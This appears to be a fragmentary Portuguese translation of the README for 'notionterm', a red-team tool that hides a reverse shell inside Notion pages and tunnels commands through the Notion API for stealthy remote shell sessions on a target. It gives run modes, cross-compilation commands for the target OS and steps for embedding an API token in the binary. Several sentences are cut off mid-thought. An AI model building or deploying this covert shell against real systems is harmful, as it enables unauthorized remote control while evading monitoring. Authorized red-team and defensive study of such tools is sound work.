
Incorporar um reverse shell em páginas do Notion usando a API do Notion como proxy, permitindo sessões remotas de shell furtivas com comunicação criptografada e autenticada para operações de red team.

notionterm no alvo.
vagamente inspirado pela grande ideia do OffensiveNotion e do notionion!
Aprender comandos e flags é muito chato: Use wrap-notionterm.sh
notionterm e transfira para a máquina alvo (veja Compilação)Há 3 maneiras principais de executar notionterm:
notionterm [flags]
ON, faça suas tarefas de reverse shell, mude para OFF para pausar, mude para ON para retomar, etc...
notionterm --server [flags]
CTRL+L para obtê-lo): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light
notionterm light [flags]
Como o notionterm é destinado a ser executado na máquina alvo, deve ser compilado para se adequar a ela.
Portanto, defina a variável de ambiente para atender ao requisito do alvo:
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
Você precisará definir a chave API e a URL da página do Notion usando variáveis de ambiente (NOTION_TOKEN & NOTION_PAGE_URL) ou flags (--token & --page-url)
Incorpore diretamente o token da API de integração do Notion e a URL da página do Notion no binário. ⚠️ Qualquer pessoa com acesso ao binário pode recuperar o token. Por razões de segurança, não o compartilhe e remova após o uso.
Defina as variáveis de ambiente correspondentes:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
E compile:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS